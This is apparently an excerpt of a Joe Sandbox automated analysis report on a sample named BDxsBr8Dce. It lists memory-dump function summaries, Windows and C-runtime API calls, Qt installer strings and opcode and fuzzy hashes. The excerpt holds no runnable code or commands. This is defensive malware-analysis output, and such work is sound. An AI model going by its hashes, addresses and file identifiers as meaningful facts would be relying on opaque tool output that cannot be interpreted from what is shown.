                                                                                                              • Part of subcall function 01106A1E: HeapAlloc.KERNEL32(01CB0000,00000000,00000001,00000000,00000000,00000000,?,01112230,00000000,00000000,00000000,00000000,?,01110B70,00000018,01590338), ref: 01106A61
                                                                                                            • _malloc.LIBCMT ref: 00F84C9A
                                                                                                            • _free.LIBCMT ref: 00F84D3E
                                                                                                            • _free.LIBCMT ref: 00F84D53
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free_malloc$AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1754078078-0
                                                                                                            • Opcode ID: 5b045449b74708ad7f5b870905450e93fcf98460ee3a4ceed35ac32f00a2ff46
                                                                                                            • Instruction ID: f2313189b12070365d81f45e6461aad45509c109cb99cd3d38cd2c42c4651ba0
                                                                                                            • Opcode Fuzzy Hash: 5b045449b74708ad7f5b870905450e93fcf98460ee3a4ceed35ac32f00a2ff46
                                                                                                            • Instruction Fuzzy Hash: C24163B19093819BC731DF14CC84B9BB7E4FF88358F00091DE98997351D739A654DB96
                                                                                                            APIs
                                                                                                            • z_adler32.BDXSBR8DCE(00000000,00000000,00000000), ref: 010767A3
                                                                                                            • z_adler32.BDXSBR8DCE(00000000,?,?,00000000,00000000,00000000), ref: 010767AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: z_adler32
                                                                                                            • String ID:
                                                                                                            • API String ID: 2329256801-0
                                                                                                            • Opcode ID: f5037e242f0321e8fb4894c8d39feb778d50439e35e66ca23604c7703d18990e
                                                                                                            • Instruction ID: 5837c2ee35f988e514b114c1b8c42519ce1dbe94454b8ab1c1be21c33512c8dd
                                                                                                            • Opcode Fuzzy Hash: f5037e242f0321e8fb4894c8d39feb778d50439e35e66ca23604c7703d18990e
                                                                                                            • Instruction Fuzzy Hash: FC212772A04B005BE6609E2DFC84B6AF7D8FB40334F104B6EF09582690E673F8818A54
                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 0110CCEB
                                                                                                              • Part of subcall function 01110AA6: __mtinitlocknum.LIBCMT ref: 01110AB8
                                                                                                              • Part of subcall function 01110AA6: EnterCriticalSection.KERNEL32(00000000,?,01115510,0000000D), ref: 01110AD1
                                                                                                            • _strlen.LIBCMT ref: 0110CD3B
                                                                                                            • _calloc.LIBCMT ref: 0110CD46
                                                                                                              • Part of subcall function 0110616F: __getptd_noexit.LIBCMT ref: 0110616F
                                                                                                            • __invoke_watson.LIBCMT ref: 0110CD9E
                                                                                                              • Part of subcall function 0111631E: IsProcessorFeaturePresent.KERNEL32(00000017,0111630D,00000000,?,?,?,?,?,0111631A,00000000,00000000,00000000,00000000,00000000,01117768), ref: 01116320
                                                                                                              • Part of subcall function 0111631E: __call_reportfault.LIBCMT ref: 01116339
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterFeaturePresentProcessorSection__call_reportfault__getptd_noexit__invoke_watson__lock__mtinitlocknum_calloc_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3738634995-0
                                                                                                            • Opcode ID: ff56f426abbd3975d6b6d1238f3ec6b5b106da06c5b02651a145731411811e80
                                                                                                            • Instruction ID: 9377ecf00ff940a44bae9357ccd7051c6fa20ef3568ac9f7cbd807462f746285
                                                                                                            • Opcode Fuzzy Hash: ff56f426abbd3975d6b6d1238f3ec6b5b106da06c5b02651a145731411811e80
                                                                                                            • Instruction Fuzzy Hash: 9F219071E00317ABDB1B6F78980079E7B65BF58758F1442A9E8089B2C4EBB5C911CFD1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 4104443479-0
                                                                                                            • Opcode ID: 96bdf7151fa67cfbd04f82451e856492824a6b245060cee8cb428ab1f566ea78
                                                                                                            • Instruction ID: 60591c5aa5a25d4705a6327bc4fbd5fa8324c40bf6070c9410808afec90f5d9b
                                                                                                            • Opcode Fuzzy Hash: 96bdf7151fa67cfbd04f82451e856492824a6b245060cee8cb428ab1f566ea78
                                                                                                            • Instruction Fuzzy Hash: 07219E7A600612EFD705CF08D880DA6B7A8EF5A2187158098F6499B322D772ED12DB90
                                                                                                            APIs
                                                                                                            • __floor_pentium4.LIBCMT ref: 0103D591
                                                                                                            • __floor_pentium4.LIBCMT ref: 0103D5B2
                                                                                                              • Part of subcall function 01107FF0: ___libm_error_support.LIBCMT ref: 011080A5
                                                                                                            • __floor_pentium4.LIBCMT ref: 0103D5D5
                                                                                                            • __floor_pentium4.LIBCMT ref: 0103D5FF
                                                                                                              • Part of subcall function 01107470: ___libm_error_support.LIBCMT ref: 01107525
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __floor_pentium4$___libm_error_support
                                                                                                            • String ID:
                                                                                                            • API String ID: 190838090-0
                                                                                                            • Opcode ID: 40dd3c01a0589045b47b23be679cbd670fd1efd09f9854e26d9c944e8df807ab
                                                                                                            • Instruction ID: ab424838062001e8cb6b6483743f362ab17d071a2ba95d77514f4667abb68b8d
                                                                                                            • Opcode Fuzzy Hash: 40dd3c01a0589045b47b23be679cbd670fd1efd09f9854e26d9c944e8df807ab
                                                                                                            • Instruction Fuzzy Hash: 7411EC71808F498BC316AF29D40401BFBF4FFAA255F004B5DE6C596190EF72E8648786
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00BFCB9C
                                                                                                              • Part of subcall function 0110392F: HeapFree.KERNEL32(00000000,00000000,?,00F7BBA2,?,00B21028,?,00000002,00000004), ref: 01103943
                                                                                                              • Part of subcall function 0110392F: GetLastError.KERNEL32(?,?,00F7BBA2,?,00B21028,?,00000002,00000004), ref: 01103955
                                                                                                            • _free.LIBCMT ref: 00BFCBA4
                                                                                                            • _free.LIBCMT ref: 00BFCBAC
                                                                                                            • _free.LIBCMT ref: 00BFCBB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 8e59d3c3704a8efa393b73fd07e6676e65344d7c430cf2c40de27dc5ce177838
                                                                                                            • Instruction ID: 7d8c864316c9dba5da2a458b686f3aa48abf1f7d3f1f109bf35de7b06a8612cd
                                                                                                            • Opcode Fuzzy Hash: 8e59d3c3704a8efa393b73fd07e6676e65344d7c430cf2c40de27dc5ce177838
                                                                                                            • Instruction Fuzzy Hash: F201A730410A0A9FD631AF28D801A5277F4EF15328B154A68E476D31E1E721F89DCB80
                                                                                                            APIs
                                                                                                              • Part of subcall function 01080400: GetModuleFileNameW.KERNEL32 ref: 01080430
                                                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,00000001), ref: 01062912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileLibraryLoadModuleName
                                                                                                            • String ID: .dll$PATH
                                                                                                            • API String ID: 1159719554-3816765965
                                                                                                            • Opcode ID: e6eb662ec33dc180472d969ec8ec3225879467f0030493814b08c8d465606282
                                                                                                            • Instruction ID: 75ea15981ff79e9ee5b83a13d81c4c470773b5805361d83c960080045dfab0f8
                                                                                                            • Opcode Fuzzy Hash: e6eb662ec33dc180472d969ec8ec3225879467f0030493814b08c8d465606282
                                                                                                            • Instruction Fuzzy Hash: 77D1E4706043019FEB55DB2CC841B6A77D8AF85338F08465CFAE6972D2DB74E909CB62
                                                                                                            APIs
                                                                                                            • ?uiObjectMemberCast@UiObjectMember@AST@QQmlJS@@UAEPAV123@XZ.BDXSBR8DCE(?), ref: 007F8659
                                                                                                              • Part of subcall function 00F7BB90: _free.LIBCMT ref: 00F7BB9D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Cast@MemberMember@V123@_free
                                                                                                            • String ID: 1.0.0$Failure to read packages from: %1.
                                                                                                            • API String ID: 1601611354-4070914720
                                                                                                            • Opcode ID: 7494813b1db3398079f75aceeeb4c020a9d65509c888eb328d06e4539fb1964b
                                                                                                            • Instruction ID: dff16936a4f7541e7425e8d5c6c6fdfa051fceb40ef8f765eed5378c8c01b38f
                                                                                                            • Opcode Fuzzy Hash: 7494813b1db3398079f75aceeeb4c020a9d65509c888eb328d06e4539fb1964b
                                                                                                            • Instruction Fuzzy Hash: 39C1F0706043059BDB64DF28C855B2AB7E4AF85324F08461DFA968B3D2DB79DC09CB93
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: No marker found, stopped after %1.$QInstaller
                                                                                                            • API String ID: 0-1588080576
                                                                                                            • Opcode ID: ac2cf97ae8ce20f3404cabffbe63e3d336d5e76d530e2f6a7b0bd56e745873b2
                                                                                                            • Instruction ID: 048566097b3c6fe31468be39cce17820a5de48cb131693dd9739123ad8d4cca8
                                                                                                            • Opcode Fuzzy Hash: ac2cf97ae8ce20f3404cabffbe63e3d336d5e76d530e2f6a7b0bd56e745873b2
                                                                                                            • Instruction Fuzzy Hash: FF91D571A40208AFEB15DFA8C980FAEB7B5EF48314F25815AF805E7381D779AD01CB91
                                                                                                            APIs
                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0103ADE4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderPathSpecial
                                                                                                            • String ID: /$/
                                                                                                            • API String ID: 994120019-2523464752
                                                                                                            • Opcode ID: e2c66e5eb270a130c3288809b15677aff22a6d49cf832f979bed7e18f14acffc
                                                                                                            • Instruction ID: b8712eab21a33e619d32854c501efbca90f7f07f631bdc263cfd4c43d90d3d94
                                                                                                            • Opcode Fuzzy Hash: e2c66e5eb270a130c3288809b15677aff22a6d49cf832f979bed7e18f14acffc
                                                                                                            • Instruction Fuzzy Hash: 60A1BFB1608341DFD724EB28C849B5EBBE8AFC5318F440A6DF5D987291EB39D508CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
